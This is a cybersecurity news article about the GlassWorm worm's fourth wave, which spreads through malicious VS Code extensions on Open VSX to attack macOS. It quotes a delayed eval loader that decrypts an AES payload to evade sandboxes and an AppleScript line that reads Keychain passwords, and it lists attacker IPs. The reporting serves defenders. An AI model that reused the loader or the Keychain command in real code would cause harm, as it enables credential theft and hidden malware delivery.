A new wave of GlassWorm malware has emerged, marking a significant shift in targeting strategy from Windows to macOS systems. This self-propagating worm, distributed through malicious VS Code extensions on the Open VSX marketplace, has already accumulated over 50,000 downloads.
The fourth wave introduces several concerning changes including encrypted payloads, hardware wallet trojanization capabilities, and sophisticated sandbox evasion techniques that allow it to bypass traditional security scanning tools.
The threat actor behind GlassWorm has proven remarkably adaptive, evolving through four distinct waves since October. Previous campaigns relied on invisible Unicode characters and compiled Rust binaries to conceal malicious code.
The latest iteration abandons these approaches in favor of AES-256-CBC encrypted JavaScript payloads specifically engineered for macOS environments.
Prettier Pro on open-vsx (Source – Koi)
Three suspicious extensions were flagged on the Open VSX marketplace: pro-svelte-extension, vsce-prettier-pro, and full-access-catppuccin-pro-extension, all connected through shared infrastructure and encryption keys.
The malware employs a Solana blockchain-based command and control infrastructure that makes takedown efforts nearly impossible.
By posting transaction memos containing base64-encoded URLs to the blockchain, the attacker maintains decentralized control that cannot be disrupted through traditional domain blocking.
Researchers traced the infrastructure to IP address 45.32.151.157, which was also used in the third wave, confirming continuity of the threat actor.
Koi analysts identified the malware through behavioral analysis after their risk engine detected unusual patterns in extension behavior and network communications.
Encrypted Payload and Sandbox Evasion Tactics
The fourth wave introduces a clever timing mechanism designed to evade automated security analysis. Once installed, the malicious extension waits exactly 15 minutes before executing its payload.
This delay is critical because most sandbox environments timeout after 5 minutes, meaning the malware appears completely benign during automated scanning.
The code contains a hardcoded value of 9e5 milliseconds (900,000 milliseconds equals 15 minutes), which triggers the decryption and execution of the AES-256-CBC encrypted payload.
setTimeout(() => {
const decrypted = crypto.createDecipheriv(‘aes-256-cbc’, key, iv);
let payload = decrypted.update(encryptedData, ‘base64’, ‘utf8’);
payload += decrypted.final(‘utf8’);
eval(payload);
}, 9e5);
Encrypted payload execution (Source – Koi)
The payload itself is embedded at line 64 of the main extension file, encrypted with a hardcoded key and initialization vector that remains consistent across all three malicious extensions.
This shared cryptographic infrastructure confirms a single threat actor is responsible for the campaign.
After the delay period expires, the malware retrieves the current command-and-control endpoint from the Solana blockchain and executes any instructions it receives.
The macOS-specific payload includes AppleScript for stealth execution, LaunchAgents for persistence rather than Windows Registry keys, and direct access to the macOS Keychain database to retrieve stored passwords and credentials.
set keychainPassword to do shell script “security find-generic-password -s ‘password_service’ -w”
The malware also includes the capability to replace hardware wallet applications with trojanized versions, targeting both Ledger Live and Trezor Suite.
While the wallet replacement functionality was not fully active during testing on December 29, 2025, the code infrastructure is complete and awaiting payload uploads.
The malware validates that downloaded files exceed 1000 bytes before installation, preventing broken installations that might alert victims.
All stolen data gets staged in the temporary directory /tmp/ijewf/, compressed, and sent to the exfiltration server at 45.32.150.251/p2p for attacker retrieval.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The post Self-Propagating GlassWorm Weaponizing VS Code Extensions to Attack macOS Users appeared first on Cyber Security News.
